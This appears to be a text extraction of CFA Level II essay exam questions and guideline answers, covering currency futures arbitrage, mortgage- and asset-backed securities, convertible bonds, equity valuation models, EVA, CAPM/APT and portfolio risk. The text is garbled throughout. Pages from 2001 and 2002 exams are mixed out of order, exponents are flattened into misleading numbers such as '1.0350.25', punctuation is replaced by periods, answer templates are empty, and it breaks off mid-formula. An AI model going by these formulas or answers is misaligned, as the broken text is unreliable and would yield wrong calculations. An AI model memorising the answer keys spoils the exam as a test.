period g compoundin
period g compoundin
market) foreign in the rate interest (1
market) local in the rate interest (1 price spot price Futures
+
+
×=
= ¥124.30000 × (1 + 0.0010)0.5 / (1 + 0.0380)0.5
= ¥124.30000 × (1.00049988 / 1.01882285)
= ¥122.06453
B. The yen arbitrage profit is ¥129,928.61, calculated as follows:
Borrow $1,000,000 for 3 months @ 3.50%
Repay principal + interest = $1,000,000 × 1.0350.25 = $1,008,637.45
Exchange the $1,000,000 borrowed @ ¥124.30 / $1.00 = ¥124,300,000
Invest the ¥124,300,000 for 3 months at 0.50%
Receive principal + interest = 124,300,000 × 1.0050.25 = ¥124,455,084.52
Sell 3-month futures to pay off US$ denominated loan
Payoff (in ¥) = $1,008,637.45 × ¥123.2605 / $1.00 = ¥124,325,155.91
Yen arbitrage profit = Proceeds from yen investment – repayment (in ¥) of the US$ loan
= ¥124,455,084.52 – ¥124,325,155.91 = ¥129,928.61
2002 Level II Guideline Answers
Morning Session - Page 24
LEVEL II, QUESTION 15
Topic: Asset Valuation
Minutes: 12
Reading References:
Fixed Income Analysis for the Chartered Financial Analyst Program, Frank J. Fabozzi
(Frank J.
Fabozzi Associates, 2000)
A. “Mortgage-Backed Securities,” Level II, Ch. 3
B. “Asset-Backed Securities,” Level II, Ch. 4
Purpose
To test the candidate’s understanding of the basic structures, cash flow characteristics,
and
methods of analysis of mortgage-based securities (MBS) and asset-backed securities
(ABS).
LOS: The candidate should be able to
“Mortgage-Backed Securities” (Study Session 16)
m) explain why and how a collateralized mortgage obligation (CMO) is created and
distinguish
among the different types of CMO structures (including sequential-pay tranches, accrual
tranches, floater tranches, inverse floater tranches, planned amortization class tranches,
support tranches, and support tranches with schedules);
o) explain, for planned amortization class (PAC) tranches, the initial PAC collar and the
effective collar;
p) explain why the support tranches have the greatest prepayment risk in a CMO
structure.
“Asset-Backed Securities” (Study Session 16)
b) explain the difference between an external and internal credit enhancement;
c) explain the different types of external credit enhancements (corporate guarantees, letter
of
credit, and bond insurance) and the problems associated with enhancing by means of
thirdparty
guarantors;
d) explain the different types of internal credit enhancements (reserve accounts and
seniorsubordinated
structures);
g) describe the cash flow for securities backed by closed-end home equity loans, open-
end
home equity loans, manufactured housing loans, student loans, and Small Business
Administration loans;
h) explain a prospectus prepayment curve for home equity loan-backed securities;
k) explain why prepayments that result from refinancing may not be significant for
manufactured housing-backed securities and automobile loan-backed securities.
2002 Level II Guideline Answers
Morning Session - Page 25
Guideline Answer:
A. i. External credit enhancements take the form of third-party guarantees that provide
protection against losses up to a specified amount. The most common examples of
external credit enhancement are:
• corporate guarantees, in which another corporation guarantees the performance of the
underlying collateral,
• letters of credit from a bank, in which a bank issues a letter of credit supporting the
performance of the collateral, and
• bond insurance, in which an insurance company writes a policy to cover losses to
investors.
The underlying credit of the issue is only as good as the credit enhancement regardless of
the quality of the loans.
ii. Internal credit enhancements take the form of internal structures that provide a cushion
or
support for credit losses. There are three common examples of internal credit
enhancements.
• Reserve funds take the form of either cash reserves or excess servicing reserves. Cash
reserves are created from issuance proceeds, and excess servicing reserves are
accumulated over the life of the issue from the difference between the net coupon and
the gross coupon. In either case a reserve is set aside for any possible future losses.
• Overcollateralization occurs when the issue is structured with collateral in excess of
the total par value of the tranches. The amount of overcollateralization can be used to
absorb losses, thereby shielding the tranches from losses up to the amount of the
overcollateralization.
• Senior/subordinated structure occurs when an issue is offered with more than one
tranche, where a senior tranche exists with a junior or subordinated tranche. The
junior or subordinated tranche acts as the first tranche to incur losses, which protects
the senior tranche.
B. The cash flows of the home equity loans will be much more affected (and the cash
flows of
the automobile receivables much less afffected) by a decline in interest rates.
The cash flows of the home equity-backed ABS will be more affected because the home
equity ABS:
• exhibits high prepayment risk (those loans will be vulnerable to refinancing by
homeowners when rates decline), and
• is fairly new (short seasoning) and has not been exposed to a low rate environment.
2002 Level II Guideline Answers
Morning Session - Page 26
The cash flows of the automobile receivable-backed ABS will be less affected because
the
auto ABS:
• does not typically exhibit prepayment risk (individuals do not tend to refinance car
loans), and
• also has an 18-month lockout that will protect it from receiving principal early.
C. With a decline in interest rates, prepayments would likely increase, and the two types
of
collateralized mortgage obligations (CMOs) would experience dramatically different
effects.
i. Planned amortization class (PAC) CMOs are created to offer protection within a
designated band of Public Securities Association (PSA) prepayment rates. The PAC
tranche is protected from the initial stream of excess prepayments and thus should see
minimal prepayments.
ii. Support bonds are the class of CMO that takes the excess prepayment from the PAC
tranches to provide protection to the PACs. The support bonds will become very short in
average life and experience a rapid increase in the return of principal as the result of
accepting the excess cash flows from the PAC tranche.
2002 Level II Guideline Answers
Morning Session - Page 27
LEVEL II, QUESTION 16
Topic: Asset Valuation
Minutes: 12
Reading Reference:
Fixed Income Analysis for the Chartered Financial Analyst Program, Frank J. Fabozzi
(Frank J.
Fabozzi Associates, 2000)
B. “Valuing Bonds with Embedded Options,” Level II, Ch. 2
Purpose:
To test the candidate’s understanding of the characteristics and return profile of
convertible
bonds compared to those of the associated common equity.
LOS: The candidate should be able to
“Valuing Bonds with Embedded Options” (Study Session 15)
p) compute the value and explain the meaning of the following for a convertible bond:
conversion value, straight value, market conversion price, market conversion premium
per
share, market conversion premium ratio, premium payback period, and premium over
straight value;
q) discuss the components of a convertible bond’s value that must be included in an
optionbased
valuation approach;
r) compare the risk–return characteristics of a convertible bond with the risk–return
characteristics of ownership of the underlying common stock.
Guideline Answer:
A. i. The current market conversion price is $39.20.
Market conversion price = convertible bond’s market price / conversion ratio
= $980.00 / 25
= $39.20
ii. The expected one-year return for the Ytel convertible bond is 18.88%.
Expected return = ((end of year price + coupon) / current price) – 1
= (($1,125.00 + $40.00) / $980.00) – 1
= 0.18878
= 18.88%
2002 Level II Guideline Answers
Morning Session - Page 28
iii. The expected one-year return for the Ytel common equity is 28.57%.
Expected return = (end of year price / current price) – 1
= ($45.00 / $35.00) – 1
= 0.28571
= 28.57%
B.
Indicate whether the value of each component should
decrease, stay the same, or increase in response to the:
Name the two components
of the convertible bond’s
value
i. Increase in Ytel’s common
equity price
(circle one)
ii. Increase in interest rates
(circle one)
1. Straight value
Stay the same
Decrease
2. Option value
Increase
Increase
Although not required to answer the question, the following explains the template entries:
The two components of the bond’s value are straight value (its value as a bond) and
option value
(the value associated with the potential conversion into equity).
i. The increase in the equity price does not affect the straight value component of the Ytel
convertible but does increase the call option component value significantly, because the
call
option becomes deep “in the money” when the $51.00 per share equity price is compared
to
the convertible’s conversion price of $40.00 ($1,000.00 / 25) per share.
ii. The increase in interest rates decreases the straight value component (bond values
decline as
interest rates increase) of the convertible bond and increases the value of the equity call
option component (call option values increase as interest rates increase), though this
increase
may be small or unnoticeable when compared to the change in the option value resulting
from the increase in the equity price.
Association for
Investment Management
and Research
Post Office Box 3668
Charlottesville VA 22903-0668
USA
Tel: 804-951-5499
Identify: To establish the identity of; to show or prove the sameness of.
Indicate: To point out or point to with more or less exactness; to show or make
known
with a fair degree of certainty.
Total: 180
Exhibit 1-1
Fundamental Industry and Market Data
Forecasted Industry Earnings Retention Rate 40%
Forecasted Industry Return on Equity 25%
Industry Beta 1.2
Government Bond Yield 6%
Equity Risk Premium 5%
A. Compute the price-to-earnings (P0/E1) ratio for the industry based on the
fundamental
data in Exhibit 1-1. Show your work.
(4 minutes)
Jones wants to analyze how fundamental P/E ratios might differ among countries. He
gathers the
data given in Exhibit 1-2.
Exhibit 1-2
Economic and Market Data
Fundamental Factors Country A Country B
Forecasted Growth in
Real Gross Domestic Product (GDP)
5% 2%
Government Bond Yield 10% 6%
Equity Risk Premium 5% 4%
B. Determine whether each of the fundamental factors in Exhibit 1-2 would cause
P/E
ratios to be generally higher for Country A or higher for Country B. Justify each of
your
conclusions with one reason.
Note: Consider each fundamental factor in isolation, with all else remaining equal.
(6 minutes)
Fundamental Factor
Determine whether
P/E ratios
Higher for Country A or
Higher for Country B
(Circle One)
Exhibit 2-1
Mackinac Inc.
Annual Income Statement
for the Year ended June 30, 2001
(in thousands, except per-share data)
Sales $250,000
Cost of Goods Sold 125,000
Gross Operating Profit $125,000
Selling, General, and Administrative Expenses 50,000
Earnings Before Interest, Taxes, Depreciation, and Amortization (EBITDA) $75,000
Depreciation and Amortization 10,500
Earnings Before Interest and Taxes (EBIT) $64,500
Interest Expense 11,000
Pretax Income $53,500
Income Taxes 16,050
Net Income $37,450
Shares Outstanding 13,000
Earnings Per Share (EPS) $2.88
Exhibit 2-2
Mackinac Inc.
Balance Sheet
as of June 30, 2001
(in thousands)
Current Assets:
Cash and Equivalents $20,000
Receivables 40,000
Inventories 29,000
Other Current Assets 23,000
Total Current Assets $112,000
Non-Current Assets:
Property, Plant, and Equipment $145,000
Less: Accumulated Depreciation (43,000)
Net Property, Plant, and Equipment $102,000
Investments 70,000
Other Non-Current Assets 36,000
Total Non-Current Assets $208,000
Total Assets $320,000
Current Liabilities:
Accounts Payable $41,000
Short Term Debt 12,000
Other Current Liabilities 17,000
Total Current Liabilities $70,000
Non-Current Liabilities:
Long Term Debt $100,000
Total Non-Current Liabilities $100,000
Total Liabilities $170,000
Shareholders. Equity:
Common Equity $40,000
Retained Earnings 110,000
Total Equity $150,000
Total Liabilities and Equity $320,000
Exhibit 2-3
Mackinac Inc.
Cash Flow Statement
for the Year ended June 30, 2001
(in thousands)
Note: Use June 30, 2001 year-end balance sheet data rather than averages in ratio
calculations.
(4 minutes)
B. Name each of the five components in the extended DuPont System and
calculate a value
for each component for Mackinac.
Note: Use June 30, 2001 year-end balance sheet data rather than averages in ratio
calculations.
(10 minutes)
Mackinac has announced that it has finalized an agreement to handle North American
production
of a successful product currently marketed by a foreign company. Jones decides to value
Mackinac using the dividend discount model (DDM) and the free cash flow-to-equity
(FCFE)
model. After reviewing Mackinac.s financial statements in Exhibits 2-1, 2-2, and 2-3 and
forecasts related to the new production agreement, Jones concludes the following:
Mackinac.s earnings and FCFE are expected to grow 17 percent per year over the
next three years before stabilizing at an annual growth rate of 9 percent.
Mackinac will maintain the current payout ratio.
Mackinac.s beta is 1.25.
The government bond yield is 6 percent and the market equity risk premium is
5 percent.
A. Calculate the value of a share of Mackinac.s common stock using the two-stage
DDM.
Show your calculations.
(8 minutes)
B. Calculate the value of a share of Mackinac.s common stock using the two-stage
FCFE
model. Show your calculations.
(8 minutes)
Jones is discussing with a corporate client the possibility of that client acquiring a 70
percent
interest in Mackinac.
A. Discuss whether the dividend discount model (DDM) or free cash flow-to-equity
(FCFE)
model is more appropriate for this client.s valuation purposes.
(3 minutes)
The proposed takeover could be hostile in nature, and both Jones and the client are
concerned
about possible defensive measures that Mackinac management might adopt to discourage
the
takeover. The client has asked Jones about the following:
B. Explain how each of these three measures could be used as a defense against a
hostile
takeover.
(6 minutes)
QUESTION 5 HAS TWO PARTS FOR A TOTAL OF 11 MINUTES.
Peninsular has another client who has inquired about the valuation method best suited for
comparison of companies in an industry that has the following characteristics:
Principal competitors within the industry are located in the United States, France,
Japan, and Brazil.
The industry is currently operating at a cyclical low, with many firms reporting losses.
The industry is subject to rapid technological change.
Jones recommends that the client consider the following valuation ratios:
1. Price-to-earnings
2. Price-to-book value
3. Price-to-sales
A. Determine which one of the three valuation ratios is most appropriate for
comparing
companies in this industry. Support your answer with two reasons that make that
ratio
superior to either of the other two ratios.
(5 minutes)
The client also has expressed interest in Economic Value Added (EVA®) as a measure of
company performance. Jones asks his assistant to prepare a presentation about EVA for
the
client. The assistant.s presentation includes the following statements:
1. EVA is a measure of a firm.s excess shareholder value generated over a long period
of time.
2. In calculating EVA, the cost of capital is the weighted average of the after-tax yield
on long-term bonds with similar risk and the cost of equity as calculated by the
capital asset pricing model.
Note: Explanations cannot repeat the statement in negative form, but must indicate what
is needed to make the statement correct.
Answer Question 5-B in the Template provided on page 29.
(6 minutes)
Statement
Determine
whether
Correct or
Incorrect
(Circle One)
Correct
Incorrect
Correct
Incorrect
3. EVA provides a
consistent measure of
performance across firms.
Correct
Incorrect
Katherine Cooper is preparing a report on the optical network component business. She
begins
her research by analyzing the competitive conditions of the industry.
One of the dominant firms in the industry is Rubylight Inc. Exhibit 6-1 contains an
excerpt from
the President.s Letter in the annual report.
Exhibit 6-1
Rubylight Inc.
2000 Annual Report
Excerpt from President.s Letter
[1]Rubylight Inc. had an exceptional year in 2000. [2]The results in almost every corner
of the business exceeded our expectations. [3]Sales at Rubylight climbed 73 percent
over fiscal 1999 to $135 million, representing the strongest year-on-year sales growth in
the company.s history. [4]Our gross margin remained constant, compared to the prior
year, at a respectable 67 percent. [5]We managed to maintain our margins, despite an
increase in direct materials cost, through an improvement in product mix and price
increases. [6]The capital markets have rewarded us for this superior financial
performance; the company.s stock price closed the year at an all time high. [7]We have
an outstanding team here at Rubylight, deserving high praise for performance.
[17]On the competitive landscape, we have seen some interesting developments over the
last year. [18]Our major competitor has focused on building distribution in the
European market. [19]That competitor appears to be exiting North America and the Far
East, which are our strongholds. [20]However, we have seen several start-ups enter the
North American market. [21]They have been able to attract significant venture capital
financing, which gives them greater ability to build brand recognition than start-ups have
enjoyed in the past.
Name each of the competitive forces faced by Rubylight, using Porter.s five-force
model.
Determine whether each competitive force is favorable or unfavorable for
Rubylight. Select,
for each competitive force, only two sentences from the President.s Letter that support
whether
the competitive force is favorable or unfavorable for Rubylight.
Note: No sentence may be selected more than once; only the sentence reference numbers
are
needed for your selection.
(16 minutes)
Unfavorable
SAMPLE
5 and 8
Favorable
Unfavorable
Favorable
Unfavorable
Favorable
Unfavorable
Favorable
Unfavorable
Favorable
QUESTION 7 HAS ONE PART FOR A TOTAL OF 6 MINUTES.
Jeffrey Bruner, CFA, uses the capital asset pricing model (CAPM) to help identify
mispriced
securities. A consultant suggests Bruner use arbitrage pricing theory (APT) instead. In
comparing CAPM and APT, the consultant made the following arguments:
1. Both the CAPM and APT require a mean.variance efficient market portfolio.
2. Neither the CAPM nor APT assumes normally distributed security returns.
3. The CAPM assumes that one specific factor explains security returns but APT does
not.
Note: Indications cannot repeat the argument in negative form, but must indicate what is
needed
to make the argument correct.
(6 minutes)
Argument
State whether
Argument is
Correct or
Incorrect
(Circle One)
Incorrect
Incorrect
Incorrect
Abigail Grace has a $900,000 fully diversified portfolio. She subsequently inherits ABC
Company common stock worth $100,000. Her financial advisor provided her with the
forecasted
information given in Exhibit 8-1.
Exhibit 8-1
Risk and Return Characteristics
Expected
Monthly Returns
Expected
Standard Deviation
of Monthly Returns
Original Portfolio 0.67% 2.37%
ABC Company 1.25% 2.95%
The expected correlation coefficient of ABC stock returns with the original portfolio
returns is
0.40.
The inheritance changes her overall portfolio and she is deciding whether or not to keep
the ABC
stock.
A. Calculate the:
i. expected return of her new portfolio that includes the ABC stock
ii. expected covariance of ABC stock returns with the original portfolio returns
iii. expected standard deviation of her new portfolio that includes the ABC stock
(6 minutes)
If Grace sells the ABC stock, she will invest the proceeds in risk-free government
securities
yielding 0.42 percent monthly.
Assuming Grace sells the ABC stock and replaces it with the government securities,
B. Calculate the:
i. expected return of her new portfolio that includes the government securities
ii. expected covariance of the government security returns with the original portfolio
returns
iii. expected standard deviation of her new portfolio that includes the government
securities
(6 minutes)
C. Determine whether the beta of her new portfolio that includes the government
securities
will be higher or lower than the beta of her original portfolio. Justify your response
with
one reason. No calculations are required.
(4 minutes)
Based on conversations with her husband, Grace is considering selling the $100,000 of
ABC
stock and acquiring $100,000 of XYZ Company common stock instead. XYZ stock has
the same
expected return and standard deviation as ABC stock. Her husband comments, .It doesn.t
matter
whether you keep all of the ABC stock or replace it with $100,000 of XYZ stock..
(4 minutes)
In a recent discussion with her financial advisor, Grace commented, .If I just don.t lose
money
in my portfolio, I will be satisfied.. She went on to say, .I am more afraid of losing
money than
I am concerned about achieving high returns..
E. i. Describe one weakness of using expected standard deviation of returns as a
risk
measure for Grace.
ii. Identify one alternate risk measure that is more appropriate under the
circumstances and justify your response with one reason.
(6 minutes)
Buckner Industries has prepared the condensed forecast income statement for the year
ending
December 31, 2002, shown in Exhibit 9-1.
Exhibit 9-1
Buckner Industries
Condensed Forecast Income Statement
Year Ending December 31, 2002
(in thousands except for per share data)
After creating the forecast, Buckner develops a new product, which will require $100
million in
additional capital expenditures at the beginning of 2002. With the new product, EBIT in
2002 is
expected to be 15 percent higher than the amount forecast in Exhibit 9-1. To finance the
increase
in the capital budget, Buckner is considering a plan using 50 percent equity and 50
percent long-
term debt. New equity would be issued at $25.00 net proceeds per share and the interest
rate on
the new long-term debt would be 8.50 percent. Buckner is reviewing how this financing,
if
completed on December 31, 2001, would affect the company.s EPS.
A. Construct a pro forma income statement for 2002, assuming the financing plan
is
adopted.
(6 minutes)
Instead of using 50 percent equity and 50 percent long-term debt, Buckner decides to
finance the
entire capital budget increase by issuing $100 million in new long-term debt.
Jack Deven, a fixed income portfolio manager with LightStreet Investments, is concerned
about
the effect of such a large debt issuance on Buckner.s credit quality and calculates selected
pro
forma financial credit quality ratios, shown in Exhibit 9-2 on page 50. LightStreet owns
previously issued option-free Buckner bonds in its U.S. Corporate Bond portfolio. These
bonds
have a 10-year maturity and a modified duration of 6.5 years.
Deven wants to compare his recalculated credit ratios to LightStreet.s credit quality
standards,
also shown in Exhibit 9-2. Buckner satisfied each of these credit quality standards prior
to the
new debt issue. For each standard no longer satisfied after the new debt issue, Deven
believes
the yield on the previously issued Buckner bonds will increase by 10 basis points.
Exhibit 9-2
Buckner Industries
LightStreet Credit Quality Standards and
Selected Pro Forma Financial Credit Quality Ratios
Financial Credit Quality Ratios
LightStreet
Credit Quality
Standards
Pro Forma Credit Quality
Ratios with Financing by
$100 Million Long-Term
Debt
Interest Coverage Ratio 4.00x 5.57x
Cash Flow from Operations (CFO)-to-Total Debt 0.50x 0.44x
Pretax Return on Total Capital 18% 22%
Pretax Income-to-Sales 28% 33%
Total Debt-to-Total Capital 50% 54%
B. i. Identify the ratios that would contribute to an increase in the total yield on the
previously issued Buckner bonds if Deven.s analysis is correct.
ii. Calculate the direction and magnitude of the percentage price change due to the
change in yield.
(4 minutes)
Rajiv Singh, a bond analyst, is examining the risk and return characteristics of mortgage
pass-
through securities.
A. Describe each of the two prepayment risks for a mortgage pass-through security
and
relate each risk to changes in interest rates.
(4 minutes)
Exhibit 10-1
Option-Adjusted Spread (OAS) Output
from a Monte Carlo Simulation of Two CMO Tranches
(15% annual volatility)
Tranche
OAS
(Basis points)
Option Cost
(Basis points)
Z Spread
(Basis points)
Effective Duration
(Years)
I 108 28 136 2.5
II 76 99 175 2.5
B. Identify which CMO tranche is less expensive on a relative value basis and
justify your
response.
(4 minutes)
Singh is also analyzing a convertible bond. The characteristics of the bond and the
underlying
common stock are given in Exhibit 11-1:
Exhibit 11-1
Convertible Bond and Underlying Stock Characteristics
Convertible Bond Characteristics
Par Value $1,000
Annual Coupon Rate (annual pay) 6.5%
Conversion Ratio 22
Market Price 105% of par value
Straight Value 99% of par value
Underlying Stock Characteristics
Current Market Price $40 per share
Annual Cash Dividend $1.20 per share
i. Conversion value
ii. Market conversion price
iii. Premium payback period
(6 minutes)
(6 minutes)
An increase in
stock price
volatility
Increase
Decrease
Remain Unchanged
An increase in
interest rate
volatility
Increase
Decrease
Remain Unchanged
Noah Kramer, a fixed income portfolio manager based in the country of Sevista, is
considering
the purchase of a Sevista government bond. The Sevista government is issuing new 25-
year
maturity debt in an amount equal to one-fourth of the total Sevista government debt
outstanding.
The proceeds from the new debt issue will be used to retire an equal amount of existing
5-year
maturity government debt. Prior to the new issue, total outstanding debt of the Sevista
government is evenly distributed among 5-, 15-, and 25-year maturities.
A. Indicate how the Sevista government bond yield curve is likely to change as a
result of
the new 25-year maturity debt issue. Support your answer using the Preferred Habitat
Theory of the term structure of interest rates.
(4 minutes)
Kramer decides to evaluate two strategies for implementing his investment in Sevista
bonds.
Exhibit 12-1 gives the details of the two strategies, and Exhibit 12-2 contains the
assumptions
that apply to both strategies.
Exhibit 12-1
Investment Strategies
(Amounts are Market Value Invested)
Strategy 5 Year Maturity
(Modified Duration
= 4.83)
15 Year Maturity
(Modified Duration
= 14.35)
25 Year Maturity
(Modified Duration
= 23.81)
I $5 million 0 $5 million
II 0 $10 million 0
Exhibit 12-2
Investment Strategy Assumptions
Market Value of Bonds $10 million
Bond Maturities 5 and 25 years
or
15 years
Bond Coupon Rates 0.00%
Target Modified Duration 15 years
Before choosing one of the two bond investment strategies, Kramer wants to analyze how
the
market value of the bonds will change if an instantaneous interest rate shift occurs
immediately
after his investment. The details of the interest rate shift are shown in Exhibit 12-3.
Exhibit 12-3
Instantaneous Interest Rate Shift
Immediately After Investment
Interest Key Rate Maturity Interest Key Rate Change
5 Year Down 75 basis points (bps)
15 Year Up 25 bps
25 Year Up 50 bps
B. Calculate, for the instantaneous interest rate shift shown in Exhibit 12-3, the
percent
change in the market value of the bonds that will occur under:
i. Strategy I
ii. Strategy II
(6 minutes)
Euros (.), or
U.S. dollars, accompanied by a combined interest rate and currency swap.
A. Explain one risk World would assume by entering into the combined interest rate
and
currency swap.
(4 minutes)
Bishop believes that issuing the U.S. dollar debt and entering into the swap can lower
World.s
cost of debt by 45 basis points. Immediately after selling the debt issue, World
would swap the
U.S. dollar payments for Euro payments throughout the maturity of the debt. She
assumes a
constant currency exchange rate throughout the tenor of the swap.
Exhibit 13-1 gives details for the two alternative debt issues. Exhibit 13-2 provides
current
information about spot currency exchange rates and the 3-year tenor Euro/U.S. Dollar
currency
and interest rate swap.
Exhibit 13-1
World Telephone Debt Details
Characteristic Euro Currency Debt U.S. Dollar Currency Debt
Par Value .3.33 billion $3 billion
Term to Maturity 3 Years 3 Years
Fixed Interest Rate 6.25% 7.75%
Interest Payment Annual Annual
Exhibit 13-2
Currency Exchange Rate and Swap Information
Spot currency exchange rate $0.90 per Euro ($0.90/.1.00)
3-year tenor Euro/U.S. Dollar
fixed interest rates
Note: Your response should show both the correct currency ($ or .) and amount for
each
cash flow.
(12 minutes)
C. State whether or not World would reduce its borrowing cost by issuing the debt
denominated in U.S. dollars, accompanied by the combined interest rate and currency
swap. Justify your response with one reason.
(6 minutes)
Donna Doni, CFA, wants to explore potential inefficiencies in the futures market. The
TOBEC
stock index has a spot value of 185.00 now. TOBEC futures contracts are settled in cash
and
underlying contract values are determined by multiplying $100 times the index value.
The
current annual risk-free interest rate is 6.0 percent.
A. Calculate the theoretical price of the futures contract expiring six months from
now,
using the cost-of-carry model. Show your calculations.
(4 minutes)
The total (round-trip) transaction cost for trading a futures contract is $15.00.
B. Calculate the lower bound for the price of the futures contract expiring six months
from
now. Show your calculations.
(6 minutes)
1. Write your candidate number in the spaces provided on the front cover of this
Essay examination book.
2. Complete and sign the pledge attached to the front cover of this examination
book.
Your examination will not be graded unless the pledge is signed. The pledge will
be detached prior to grading.
3. Write your answers in blue or black ink on the designated answer pages in the
examination book.
5. Use only the Texas Instruments BAII Plus or the Hewlett Packard 12C
calculator.
All other calculators will be confiscated and a report will be submitted to AIMR.
6. Only answers written on the correct answer pages will be graded. You may
make
marks and notes on the question pages, but these marks will not be graded.
7. If you use all of the designated pages, check the box at the bottom of the last
page
of your answer and continue your answer on the unnumbered extra pages at the
back of the examination book. Label extra pages with the correct question
number.
8. You must stop writing immediately when instructed to do so at the conclusion
of
the examination.
Reading Reference:
.Price/Earnings Multiples,. Ch. 14 Investment Valuation: Tools and Techniques
for Determining
the Value of Any Asset, Aswath Damodaran (Wiley, 1996)
Purpose:
To test the candidate.s: 1) understanding of industry and country price/earnings multiples,
and 2)
ability to calculate values for those multiples.
Guideline Answer:
A. The industry.s estimated P/E can be computed using the following model:
P0 / E1 = payout ratio / (r . g)
However, because r and g are not explicitly given, they must be computed using the
following formulas:
Therefore:
B.
Fundamental Factor
Determine whether
P/E ratios
Higher for Country A or
Higher for Country B
(Circle One)
Reading References:
1. .Managing Growth,. Ch. 4 Analysis for Financial Management, 5th or 6th
edition, Robert C.
Higgins (Irwin, 1998 or 2000)
2. .Analysis of Financial Statements,. Ch. 12 Investment Analysis and Portfolio
Management,
5th edition, Frank K. Reilly and Keith C. Brown (Dryden, 1997)
Purpose:
To test the candidate.s ability to calculate: 1) a company.s sustainable growth rate, and 2)
the
financial ratios that comprise the extended DuPont System.
Guideline Answer:
A. Sustainable growth rate = return on equity × earnings retention rate
= ($37,450 / $150,000) × (1 . ($22,470 / $37,450))
= 24.97% × 0.40
= 9.99%
2001 Level II Guideline Answers
Morning Section . Page 4
B.
Component Value
Operating Profit Margin (EBIT / Sales)
Total Asset Turnover (Sales / Total Assets)
Interest Expense Rate (Interest Expense / Total Assets)
Financial Leverage Multiplier (Total Assets / Equity)
Tax Retention Rate [100% - (Income Tax / EBT)]
0.258
0.781
0.034
2.133
0.700
Note: Although not part of the guideline answer, the components shown above may be
used in
the following formula to compute return on equity (ROE):
ROE = [(Operating Profit Margin × Total Asset Turnover) . Interest Expense Rate]
× Financial Leverage Multiplier × Tax Retention Rate
Reading Reference:
Investment Valuation: Tools and Techniques for Determining the Value
of Any Asset, Aswath
Damodaran (Wiley, 1996).
A. .Dividend Discount Models,. Ch. 10
B. .Free Cashflows to Equity Discount Models,. Ch. 11
Purpose:
To test the candidate.s ability to calculate the value of a company.s equity using: 1) the
two-
stage dividend discount model, and 2) the two-stage free cash flow model.
Guideline Answer:
A. Using a two-stage dividend discount model, the value of a share of Mackinac is
calculated as
follows:
Cost of Equity (r) = Long Bond Rate + (Beta × Equity Risk Premium)
= 0.06 + (1.25 × 0.05) = 0.1225 or 12.25%
Reading References:
1. Investment Valuation: Tools and Techniques for Determining the
Value of Any Asset, Aswath
Damodaran (Wiley, 1996)
A. .Dividend Discount Models,. Ch. 10
B. .Free Cashflows to Equity Discount Models,. Ch. 11
2. .Mergers, LBOs, Divestitures, and Holding Companies,. Ch. 21, Fundamentals of
Financial
Management, 8th edition, Eugene F. Brigham and Joel F. Houston (Dryden, 1998)
Purpose:
To test the candidate.s: 1) ability to determine the valuation model that is most
appropriate given
a specific company.s circumstances, and 2) understanding of different measures that can
be used
against a hostile takeover.
Guideline Answer:
A. The FCFE model is best for valuing firms for takeovers or where there is a reasonable
chance
of changing corporate control. Because controlling stockholders can change the dividend
policy, they are interested in estimating the maximum residual cash flow after meeting all
financial obligations and investment needs. The dividend discount model is based upon
the
premise that the only cash flows received by stockholders are dividends. FSFE uses a
more
expansive definition to measure what a firm can afford to pay out as dividends.
2001 Level II Guideline Answers
Morning Section . Page 8
B. Employee Stock Ownership Plans (ESOP): A large block of stock in an ESOP (either
existing
or recently created) is likely to vote in support of management positions and therefore
make
an unwanted takeover more difficult.
Stock purchase rights: Such rights are a type of .poison pill. that give current stockholders
the right to purchase, at bargain prices, either new stock in their company or stock in the
acquiring company when a hostile potential acquirer purchases a certain percentage of the
stock of their company. This makes the purchase price higher, reducing the likelihood of
an
unwanted takeover.
Golden parachute: Golden parachutes are large payments to specified current managers;
such
payments are triggered only by the purchase of the firm, thereby materially increasing the
acquisition expense to the buyer and reducing the likelihood of an unwanted takeover.
Reading References:
1. Investment Valuation: Tools and Techniques for Determining the
Value of Any Asset, Aswath
Damodaran (Wiley, 1996)
A .Price/Book Value Multiples,. Ch. 15
B. .Price/Sales Multiples,. Ch. 16
2. Company Performance and Measures of Value Added, pp. 1-47, Pamela
P. Peterson and
David R. Peterson (Research Foundation of the ICFA, 1997)
3. .An Analysis of EVA®,” Richard Bernstein and Carmen Pigler,
Quantitative Viewpoint
(Merrill Lynch, 19 December 1997)
Purpose:
To test the candidate.s: 1) understanding of differences among valuation approaches, 2)
ability to
determine the appropriateness of using a specified valuation approach, and 3)
understanding of
alternative performance measurement and valuation methods.
More useful in valuing companies with negative earnings or negative book values (a
frequent consequence of rapid technological change)
Better able to compare companies in different countries that are likely to be using
different accounting methods, i.e., standards (a consequence of the multinational nature
of the industry)
Less subject to manipulation, i.e., managing earnings by management (a frequent
consequence when firms are in a cyclical low and likely to report losses)
Not as volatile as PE multiples and hence may be more reliable for use in valuation
Less subject to distortion from currency translation effects
Less influenced by accounting values in the presence of rapid technological change
2001 Level II Guideline Answers
Morning Section . Page 11
B.
Statement
Determine
whether
Correct or
Incorrect
(Circle One)
Incorrect
EVA is a measure of economic profit. Such a
measure may or may not have also generated
.excess shareholder value..
EVA is a measure of value added by the firm.s
management during a period.
2. In calculating EVA, the
cost of capital is the
weighted average of the
after-tax yield on long-
term bonds with similar
risk and the cost of
equity as calculated by
the capital asset pricing
model.
Correct
3. EVA provides a
consistent measure of
performance across
firms.
Incorrect
Size of the firm, for example, affects
EVA/MVA. The measure also requires
estimates of cost of capital and other
components of the calculation. It is, therefore,
anything but straightforward and not
necessarily consistent across firms.
Accounting standards, methods, practices, and
decisions result in differences.
Reading References:
1. .Competitive Strategy: The Core Concepts,. Michael E. Porter, Competitive
Advantage:
Creating and Sustaining Superior Performance (The Free Press, 1985)
2. .Industry Analysis,.Ch.6, Security Analysis on Wall Street: A
Comprehensive Guide to
Today.s Valuation Methods, Jeffrey C. Hooke (Wiley, 1998)
Purpose:
To test the candidate.s understanding of the competitive forces that affect the profitability
of a
company.
Reading Reference:
Investment Analysis and Portfolio Management, 5th edition, Frank K. Reilly
and Keith C. Brown
(Dryden, 1997)
A. .An Introduction to Asset Pricing Models,. Ch. 9
B. .Extensions and Testing of Asset Pricing Theories,. Ch. 10
Purpose:
To test the candidate.s understanding of similarities and differences between APT and the
CAPM.
Argument
State whether
Argument is
Correct or
Incorrect
(Circle One)
Incorrect
Correct
Reading Reference:
.An Introduction to Portfolio Management,. Ch. 8, Investment Analysis and
Portfolio
Management, 5th edition, Frank K. Reilly and Keith C. Brown (Dryden, 1997)
Purpose:
To test the candidate.s: 1) ability to calculate portfolio risk and return measures,
and 2)
understanding of alternative risk measures.
Guideline Answer:
A. Subscript OP refers to the original portfolio, ABC to the new stock, and NP to the
new
portfolio.
NP = [wOP
2 OP 2 + wABC
